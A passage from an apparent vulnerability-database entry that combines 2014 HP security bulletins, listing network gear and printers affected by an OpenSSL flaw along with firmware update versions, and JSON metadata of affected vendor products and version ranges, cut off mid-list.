MSR9XX Russian version Fix in progress use mitigations JF812A HP MSR900 Router JF813A HP MSR920 Router JF814A HP MSR900-W Router JF815A HP MSR920 2FEWAN/8FELAN/.11b/g Rtr H3C MSR 900 Router 2 FE WAN 4 FE LAN 256DDR (0235A0BX) H3C MSR 920 Router 2 FE WAN 8 FE LAN 256DDR (0235A0C0) H3C MSR 900 Router with 802.11b/g 2 FE WAN 4 FE LAN 256DDR 802.11b (0235A0C2) H3C MSR 920 Router with 802.11b/g 2 FE WAN 8 FE LAN 256DDR (0235A0C4)

MSR93X Fix in progress use mitigations JG511A HP MSR930 Router JG512A HP MSR930 Wireless Router JG513A HP MSR930 3G Router JG514A HP MSR931 Router JG515A HP MSR931 3G Router JG516A HP MSR933 Router JG517A HP MSR933 3G Router JG518A HP MSR935 Router JG519A HP MSR935 Wireless Router JG520A HP MSR935 3G Router JG531A HP MSR931 Dual 3G Router JG596A HP MSR930 4G LTE/3G CDMA Router JG597A HP MSR936 Wireless Router JG665A HP MSR930 4G LTE/3G WCDMA Global Router JG704A HP MSR930 4G LTE/3G WCDMA ATT Router

MSR93X Russian version Fix in progress use mitigations JG511A HP MSR930 Router JG512A HP MSR930 Wireless Router JG513A HP MSR930 3G Router JG514A HP MSR931 Router JG515A HP MSR931 3G Router JG516A HP MSR933 Router JG517A HP MSR933 3G Router JG518A HP MSR935 Router JG519A HP MSR935 Wireless Router JG520A HP MSR935 3G Router JG531A HP MSR931 Dual 3G Router JG596A HP MSR930 4G LTE/3G CDMA Router JG597A HP MSR936 Wireless Router JG665A HP MSR930 4G LTE/3G WCDMA Global Router JG704A HP MSR930 4G LTE/3G WCDMA ATT Router

MSR1000 Fix in progress use mitigations JG732A HP MSR1003-8 AC Router

MSR2000 Fix in progress use mitigations JG411A HP MSR2003 AC Router

MSR3000 Fix in progress use mitigations JG404A HP MSR3064 Router JG405A HP MSR3044 Router JG406A HP MSR3024 AC Router JG409A HP MSR3012 AC Router JG861A HP MSR3024 TAA-compliant AC Router

MSR4000 Fix in progress use mitigations JG402A HP MSR4080 Router Chassis JG403A HP MSR4060 Router Chassis JG412A HP MSR4000 MPU-100 Main Processing Unit

F5000 Fix in progress use mitigations JG216A HP F5000 Firewall Standalone Chassis JD259A HP A5000-A5 VPN Firewall Chassis H3C SecPath F5000-A5 Host System (0150A0AG)

U200S and CS Fix in progress use mitigations JD268A HP 200-CS UTM Appliance JD273A HP U200-S UTM Appliance H3C SecPath U200-S (0235A36N)

U200A and M Fix in progress use mitigations JD274A HP 200-M UTM Appliance JD275A HP U200-A UTM Appliance H3C SecPath U200-A (0235A36Q)

F1000A and S Fix in progress use mitigations JD270A HP S1000-S VPN Firewall Appliance JD271A HP S1000-A VPN Firewall Appliance JG213A HP F1000-S-EI VPN Firewall Appliance JG214A HP F1000-A-EI VPN Firewall Appliance

SecBlade FW Fix in progress use mitigations JC635A HP 12500 VPN Firewall Module JD245A HP 9500 VPN Firewall Module JD249A HP 10500/7500 Advanced VPN Firewall Mod JD250A HP 6600 Firewall Processing Rtr Module JD251A HP 8800 Firewall Processing Module JD255A HP 5820 VPN Firewall Module H3C S9500E SecBlade VPN Firewall Module (0231A0AV) H3C S7500E SecBlade VPN Firewall Module (0231A832) H3C SR66 Gigabit Firewall Module (0231A88A) H3C SR88 Firewall Processing Module (0231A88L) H3C S5820 SecBlade VPN Firewall Module (0231A94J)

F1000E Fix in progress use mitigations JD272A HP S1000-E VPN Firewall Appliance

VSR1000 Fix in progress use mitigations JG810AAE HP VSR1001 Virtual Services Router JG811AAE HP VSR1001 Virtual Services Router JG812AAE HP VSR1004 Virtual Services Router JG813AAE HP VSR1008 Virtual Services Router

WX5002/5004 Fix in progress use mitigations JD441A HP 5800 ACM for 64-256 APs JD447B HP WX5002 Access Controller JD448A HP A-WX5004 Access Controller JD448B HP WX5004 Access Controller JD469A HP A-WX5004 (3Com) Access Controller JG261A HP 5800 Access Controller OAA TAA Mod

HP 850/870 Fix in progress use mitigations JG723A HP 870 Unified Wired-WLAN Appliance JG725A HP 870 Unifd Wrd-WLAN TAA Applnc

HP 830 Fix in progress use mitigations JG640A HP 830 24P PoE+ Unifd Wired-WLAN Swch JG641A HP 830 8P PoE+ Unifd Wired-WLAN Swch JG646A HP 830 24-Port PoE+ Wrd-WLAN TAA Switch JG647A HP 830 8-Port PoE+ Wrd-WLAN TAA Switch

HP 6000 Fix in progress use mitigations JG639A HP 10500/7500 20G Unified Wired-WLAN Mod JG645A HP 10500/7500 20G Unifd Wrd-WLAN TAA Mod

M220 Fix in progress use mitigations J9798A HP M220 802.11n AM Access Point J9799A HP M220 802.11n WW Access Point

NGFW Fix in progress use mitigations JC882A HP S1050F NGFW Aplnc w/DVLabs 1-yr Lic JC883A HP S3010F NGFW Aplnc w/DVLabs 1-yr Lic JC884A HP S3020F NGFW Aplnc w/DVLabs 1-yr Lic JC885A HP S8005F NGFW Aplnc w/DVLabs 1-yr Lic JC886A HP S8010F NGFW Aplnc w/DVLabs 1-yr Lic

iMC UAM 7.0 Fix in progress use mitigations JD144A HP IMC UAM S/W Module w/200-User License JF388A HP IMC UAM S/W Module w/200-user License JD435A HP IMC EAD Client Software JF388AAE HP IMC UAM S/W Module w/200-user E-LTU JG752AAE HP IMC UAM SW Mod w/ 50-user E-LTU

iMC EAD 7.0 Fix in progress use mitigations JF391AAE HP IMC EAD S/W Module w/200-user E-LTU JG754AAE HP IMC EAD SW Module w/ 50-user E-LTU JD147A HP IMC Endpoint Admission Defense Software Module with 200-user License JF391A HP IMC EAD S/W Module w/200-user License

iMC PLAT 7.0 Fix in progress use mitigations JF377AAE HP IMC Standard Edition Software Platform with 100-node E-LTU JG549AAE HP PCM+ to IMC Std Upgr w/200-node E-LTU JG747AAE HP IMC Standard Software Platform with 50-node E-LTU JG768AAE HP PCM+ to IMC Std Upg w/ 200-node E-LTU JD125A HP IMC Standard Edition Software Platform with 100-node License JD815A HP IMC Standard Edition Software Platform with 100-node License JD816A HP A-IMC Standard Edition Software DVD Media JF377A HP IMC Standard Edition Software Platform with 100-node License JF288AAE HP Network Director to Intelligent Management Center Upgrade E-LTU JF289AAE HP Enterprise Management System to Intelligent Management Center Upgrade E-LTU TJ635AAE HP IMC for ANM 50 node pack SW E-LTU (On HP Softwares CPL not HPNs) JF378AAE HP IMC Enterprise Edition Software Platform with 200-Node E-LTU JG748AAE HP IMC Enterprise Software Platform with 50-node E-LTU JD126A HP A-IMC Enterprise Software Platform with 200-node License JD808A HP A-IMC Enterprise Software Platform with 200-node License JD814A HP A-IMC Enterprise Edition Software DVD Media JF378A HP IMC Enterprise Edition Software Platform with 200-node License JG546AAE HP IMC Basic SW Platform w/50-node E-LTU JG548AAE HP PCM+ to IMC Bsc Upgr w/50-node E-LTU JG550AAE HP PMM to IMC Bsc WLM Upgr w/150 AP E-LTU JG590AAE HP IMC Bsc WLAN Mgr SW Pltfm 50 AP E-LTU JG659AAE HP IMC Smart Connect Virtual Appliance Edition E-LTU JG766AAE HP IMC Smart Connect Virtual Appliance Edition E-LTU JG660AAE HP IMC Smart Connect w / WLAN Manager Virtual Appliance Edition E-LTU JG767AAE HP IMC Smart Connect with Wireless Service Manager Virtual Appliance Software E-LTU

HISTORY Version:1 (rev.1) - 20 June 2014 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.

3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX

Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (GNU/Linux)

iEYEARECAAYFAlOkrM4ACgkQ4B86/C0qfVn7/QCeK5T1H9dXfVQgIKSr5USqLmvq CtMAnjujH7e5aXfIOvxyyuB0FcSwIWCM =CEL7 -----END PGP SIGNATURE----- . OpenSSL is a 3rd party product that is embedded with some HP printer products. This bulletin notifies HP Printer customers about impacted products. To obtain the updated firmware, go to www.hp.com and follow these steps:

Select "Drivers & Software". Enter the appropriate product name listed in the table below into the search field. Click on "Search". Click on the appropriate product. Under "Select operating system" click on "Cross operating system (BIOS, Firmware, Diagnostics, etc.)" Note: If the "Cross operating system ..." link is not present, select applicable Windows operating system from the list. Select the appropriate firmware update under "Firmware".

Firmware Updates Table

Product Name Model Number Firmware Revision

HP Color LaserJet CM4540 MFP CC419A, CC420A, CC421A v 2302963_436067 (or higher)

HP Color LaserJet CP5525 CE707A,CE708A,CE709A v 2302963_436070 (or higher)

HP Color LaserJet Enterprise M750 D3L08A, D3L09A, D3L10A v 2302963_436077 (or higher)

HP Color LaserJet M651 CZ255A, CZ256A, CZ257A, CZ258A v 2302963_436073 (or higher)

HP Color LaserJet M680 CZ248A, CZ249A v 2302963_436072 (or higher)

HP Color LaserJet Flow M680 CZ250A, CA251A v 2302963_436072 (or higher)

HP LaserJet Enterprise 500 color MFP M575dn CD644A, CD645A v 2302963_436081 (or higher)

HP LaserJet Enterprise 500 MFP M525f CF116A, CF117A v 2302963_436069 (or higher)

HP LaserJet Enterprise 600 M601 Series CE989A, CE990A v 2302963_436082 (or higher)

HP LaserJet Enterprise 600 M602 Series CE991A, CE992A, CE993A v 2302963_436082 (or higher)

HP LaserJet Enterprise 600 M603 Series CE994A, CE995A, CE996A v 2302963_436082 (or higher)

HP LaserJet Enterprise MFP M630 series B3G84A, B3G85A, B3G86A, J7X28A v 2303714_233000041 (or higher)

HP LaserJet Enterprise 700 color M775 series CC522A, CC523A, CC524A, CF304A v 2302963_436079 (or higher)

HP LaserJet Enterprise 700 M712 series CF235A, CF236A, CF238A v 2302963_436080 (or higher)

HP LaserJet Enterprise 800 color M855 A2W77A, A2W78A, A2W79A v 2302963_436076 (or higher)

HP LaserJet Enterprise 800 color MFP M880 A2W76A, A2W75A, D7P70A, D7P71A v 2302963_436068 (or higher)

HP LaserJet Enterprise Color 500 M551 Series CF081A,CF082A,CF083A v 2302963_436083 (or higher)

HP LaserJet Enterprise color flow MFP M575c CD646A v 2302963_436081 (or higher)

HP LaserJet Enterprise flow M830z MFP CF367A v 2302963_436071 (or higher)

HP LaserJet Enterprise flow MFP M525c CF118A v 2302963_436069 (or higher)

HP LaserJet Enterprise M4555 MFP CE502A,CE503A, CE504A, CE738A v 2302963_436064 (or higher)

HP LaserJet Enterprise M806 CZ244A, CZ245A v 2302963_436075 (or higher)

HP LaserJet Enterprise MFP M725 CF066A, CF067A, CF068A, CF069A v 2302963_436078 (or higher)

HP Scanjet Enterprise 8500 Document Capture Workstation L2717A, L2719A v 2302963_436065 (or higher)

OfficeJet Enterprise Color MFP X585 B5L04A, B5L05A,B5L07A v 2302963_436066 (or higher)

OfficeJet Enterprise Color X555 C2S11A, C2S12A v 2302963_436074 (or higher)

HP Color LaserJet CP3525 CC468A, CC469A, CC470A, CC471A v 06.183.1 (or higher)

HP LaserJet M4345 Multifunction Printer CB425A, CB426A, CB427A, CB428A v 48.306.1 (or higher)

HP LaserJet M5025 Multifunction Printer Q7840A v 48.306.1 (or higher)

HP Color LaserJet CM6040 Multifunction Printer Q3938A, Q3939A v 52.256.1 (or higher)

HP Color LaserJet Enterprise CP4525 CC493A, CC494A, CC495A v 07.164.1 (or higher)

HP Color LaserJet Enterprise CP4025 CC489A, CC490A v 07.164.1 (or higher)

HP LaserJet M5035 Multifunction Printer Q7829A, Q7830A, Q7831A v 48.306.1 (or higher)

HP LaserJet M9050 Multifunction Printer CC395A v 51.256.1 (or higher)

HP LaserJet M9040 Multifunction Printer CC394A v 51.256.1 (or higher)

HP Color LaserJet CM4730 Multifunction Printer CB480A, CB481A, CB482A, CB483A v 50.286.1 (or higher)

HP LaserJet M3035 Multifunction Printer CB414A, CB415A, CC476A, CC477A v 48.306.1 (or higher)

HP 9250c Digital Sender CB472A v 48.293.1 (or higher)

HP LaserJet Enterprise P3015 CE525A,CE526A,CE527A,CE528A,CE595A v 07.186.1 (or higher)

HP LaserJet M3027 Multifunction Printer CB416A, CC479A v 48.306.1 (or higher)

HP LaserJet CM3530 Multifunction Printer CC519A, CC520A v 53.236.1 (or higher)

HP Color LaserJet CP6015 Q3931A, Q3932A, Q3933A, Q3934A, Q3935A v 04.203.1 (or higher)

HP LaserJet P4515 CB514A,CB515A, CB516A, CB517A v 04.213.1 (or higher)

HP Color LaserJet CM6030 Multifunction Printer CE664A, CE665A v 52.256.1 (or higher)

HP LaserJet P4015 CB509A, CB526A, CB511A, CB510A v 04.213.1 (or higher)

HP LaserJet P4014 CB507A, CB506A, CB512A v 04.213.1 (or higher)

HISTORY Version:1 (rev.1) - 22 September 2014 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201406-0445",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "jboss enterprise application platform",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "redhat",
        "version": "6.2.3"
      },
      {
        "model": "jboss enterprise web server",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "redhat",
        "version": "2.0.1"
      },
      {
        "model": "jboss enterprise web platform",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "redhat",
        "version": "5.2.0"
      },
      {
        "model": "power",
        "scope": "eq",
        "trust": 1.2,
        "vendor": "ibm",
        "version": "7200"
      },
      {
        "model": "powerlinux 7r2",
        "scope": "eq",
        "trust": 1.2,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "openssl",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "0.9.8za"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "rox",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "1.16.1"
      },
      {
        "model": "openssl",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0m"
      },
      {
        "model": "openssl",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0"
      },
      {
        "model": "openssl",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "13.1"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "20"
      },
      {
        "model": "application processing engine",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.0.2"
      },
      {
        "model": "python",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "python",
        "version": "3.4.2"
      },
      {
        "model": "s7-1500",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "1.6"
      },
      {
        "model": "jboss enterprise application platform",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "5.2.0"
      },
      {
        "model": "node.js",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "nodejs",
        "version": "0.10.29"
      },
      {
        "model": "python",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "python",
        "version": "2.7.8"
      },
      {
        "model": "server",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "filezilla",
        "version": "0.9.45"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "19"
      },
      {
        "model": "storage",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "python",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "python",
        "version": "3.4.0"
      },
      {
        "model": "mariadb",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "mariadb",
        "version": "10.0.13"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "cp1543-1",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "1.1.25"
      },
      {
        "model": "openssl",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1h"
      },
      {
        "model": "mariadb",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "mariadb",
        "version": "10.0.0"
      },
      {
        "model": "python",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "python",
        "version": "2.7.0"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "13.2"
      },
      {
        "model": "power",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "ibm",
        "version": "7100"
      },
      {
        "model": "power",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "ibm",
        "version": "7400"
      },
      {
        "model": "powerlinux 7r1",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "bladecenter advanced management module 3.66e",
        "scope": null,
        "trust": 0.9,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "junos 12.1x44-d20",
        "scope": null,
        "trust": 0.9,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "power express",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "ibm",
        "version": "5200"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "juniper",
        "version": "10.4"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "juniper",
        "version": "11.4"
      },
      {
        "model": "junos 11.4r9",
        "scope": null,
        "trust": 0.6,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "juniper",
        "version": "13.3"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "juniper",
        "version": "12.3"
      },
      {
        "model": "power",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ibm",
        "version": "7700"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "juniper",
        "version": "10.1"
      },
      {
        "model": "one-x mobile sip for ios",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "avaya",
        "version": "6.2.2"
      },
      {
        "model": "one-x mobile sip for ios",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "avaya",
        "version": "6.2.5"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "juniper",
        "version": "10.0"
      },
      {
        "model": "power",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ibm",
        "version": "5700"
      },
      {
        "model": "power",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ibm",
        "version": "7800"
      },
      {
        "model": "power",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ibm",
        "version": "7300"
      },
      {
        "model": "power",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "ibm",
        "version": "7500"
      },
      {
        "model": "junos 10.4s15",
        "scope": null,
        "trust": 0.6,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "juniper",
        "version": "12.1x45"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "juniper",
        "version": "12.1"
      },
      {
        "model": "junos 13.2r2",
        "scope": null,
        "trust": 0.6,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 10.4r15",
        "scope": null,
        "trust": 0.6,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "juniper",
        "version": "11.1"
      },
      {
        "model": "one-x mobile sip for ios",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "one-x mobile sip for ios",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "avaya",
        "version": "6.2.3"
      },
      {
        "model": "junos 13.3r1",
        "scope": null,
        "trust": 0.6,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 10.4s",
        "scope": null,
        "trust": 0.6,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "one-x mobile sip for ios",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "avaya",
        "version": "6.2.4"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "juniper",
        "version": "12.2"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "juniper",
        "version": "11.2"
      },
      {
        "model": "one-x mobile sip for ios",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "avaya",
        "version": "6.2.1"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "juniper",
        "version": "10.2"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "juniper",
        "version": "11.4x27"
      },
      {
        "model": "junos 11.4r8",
        "scope": null,
        "trust": 0.6,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 10.4r16",
        "scope": null,
        "trust": 0.6,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 12.1x45-d10",
        "scope": null,
        "trust": 0.6,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "juniper",
        "version": "12.1x44"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "juniper",
        "version": "13.1"
      },
      {
        "model": "junos 12.1r7",
        "scope": null,
        "trust": 0.6,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "juniper",
        "version": "10.3"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "openssl",
        "version": "0.9.8k"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "openssl",
        "version": "0.9.8j"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "openssl",
        "version": "0.9.8p"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "openssl",
        "version": "0.9.8n"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "openssl",
        "version": "0.9.8q"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "openssl",
        "version": "0.9.8m"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "openssl",
        "version": "0.9.8l"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "openssl",
        "version": "0.9.8o"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.110.6"
      },
      {
        "model": "storevirtual 1tb mdl sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433011.5"
      },
      {
        "model": "power ps702",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "cloudplatform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "4.30"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "4.3.3"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "1.0.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.117"
      },
      {
        "model": "junos d30",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.1x45"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.112"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.46"
      },
      {
        "model": "chrome for android",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.141"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "fortigate",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "4.3.6"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.6"
      },
      {
        "model": "integration bus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.0.0"
      },
      {
        "model": "tandberg mxp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8800"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.18"
      },
      {
        "model": "sylpheed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sylpheed",
        "version": "1.9.1"
      },
      {
        "model": "oncommand performance manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5600v210.1"
      },
      {
        "model": "nexus series switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "90000"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.10"
      },
      {
        "model": "idataplex dx360 m4 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "79120"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.155"
      },
      {
        "model": "laserjet pro color printer m251n/nw cf147a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "20020140919"
      },
      {
        "model": "horizon view feature pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.3"
      },
      {
        "model": "mysql",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.5"
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.1.0"
      },
      {
        "model": "arubaos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "arubanetworks",
        "version": "6.4"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
